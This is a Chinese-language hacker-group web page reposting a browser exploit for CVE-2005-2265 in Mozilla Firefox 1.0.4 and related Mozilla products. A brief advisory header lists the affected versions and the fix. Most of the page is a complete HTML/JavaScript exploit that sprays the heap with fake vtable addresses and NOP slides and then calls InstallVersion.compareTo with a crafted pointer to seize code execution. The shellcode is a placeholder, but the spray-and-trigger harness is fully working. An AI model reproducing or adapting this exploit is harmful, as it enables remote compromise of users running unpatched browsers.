Mozilla Firefox “InstallVersion.compareTo()” Remote Buffer Overflow Exploit || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 黑客技术 >> Exploit >> 文章正文	用户登录新用户注册

Mozilla Firefox “InstallVersion.compareTo()” Remote Buffer Overflow Exploit

热

【字体：小大】

Mozilla Firefox “InstallVersion.compareTo()” Remote Buffer Overflow Exploit

作者：佚名文章来源：CnXHacker.Net 点击数：更新时间：2006-10-29

------------------------------------------------------------------------------
名称：Mozilla Firefox "InstallVersion.compareTo()" Remote Buffer Overflow Exploit
漏洞资料：http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2265
危险程度：严重
影响范围：Mozilla Firefox 1.0.4、Mozilla Suite 1.7.8、Thunderbird 1.0.2 以及它们之前所有版本
解决办法：升级到Mozilla Firefox 1.0.6、Mozilla Suite 1.7.10、Thunderbird 1.0.5 或更新版本
相关介绍：Mozilla Firefox 是一款开源免费安全高效小巧的浏览器

------------------------------------------------------------------------------

< html> < head>   < title>Mozilla (Firefox<=v1.04) InstallVersion-> compareTo Remote Code Execution Exploit< /title> < script language="javascript"> function BodyOnLoad() { location.href="javascript:void (new InstallVersion());"; CrashAndBurn(); }; // The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology function CrashAndBurn() { // Spray up to this address var heapSprayToAddress=0x12000000; // Payload - Just return.. var payLoadCode=unescape("%u9090%u90C3"); // Size of the heap blocks var heapBlockSize=0x400000; // Size of the payload in bytes var payLoadSize=payLoadCode.length * 2; // Caluclate spray slides size var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header // Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C var spraySlide1 = unescape("%u002C%u11C0"); //var spraySlide1 = unescape("%u7070%u7070"); // For testing spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize); var spraySlide2 = unescape("%u002C%u1200"); //0x1200002C //var spraySlide2 = unescape("%u8080%u8080"); // For testing spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize); var spraySlide3 = unescape("%u9090%u9090"); spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize); // Spray the heap heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize; //alert(spraySlide2.length); return; memory = new Array(); for (i=0;i< heapBlocks;i++) { memory[i]=(i%3==0) ? spraySlide1 + payLoadCode: (i%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode; } // Set address to fake "pdata". var eaxAddress = 0x1180002C; // This was taken from shutdown's PoC in bugzilla // struct vtbl { void (*code)(void); }; // struct data { struct vtbl *pvtbl; }; // // struct data *pdata = (struct data *)(xxAddress & ~0x01); // pdata->pvtbl->code(pdata); // (new InstallVersion).compareTo(new Number(eaxAddress >> 1)); } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2< spraySlideSize) { spraySlide+=spraySlide; } spraySlide=spraySlide.substring(0,spraySlideSize/2); return spraySlide; } // --> < /script> < /head> < body onload="BodyOnLoad()"> < /body> < /html>

文章录入：IceRiver 责任编辑：admin

上一篇文章： Lyris ListManager “/read/attachment” Remote SQL Injection Exploit

下一篇文章： Watchfire AppScan QA HTTP Response Handling Remote Buffer Overflow Exploit

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				McAfee发布Windows Mobile风 Motorola Timbuktu Pro处理文 Mozilla：火狐3.0将增加两项 Mozilla撤回十天内修复高危漏通过MSN传播的IRCBot msnmsg irefox/Thunderbird/SeaMonk Mozilla发布官方黑客工具 Mozilla Firefox 2.0.0.4浏览采用mod_ssl让Apache更加安全 Mozilla Firefox WYCIWYG://

　网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）


关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM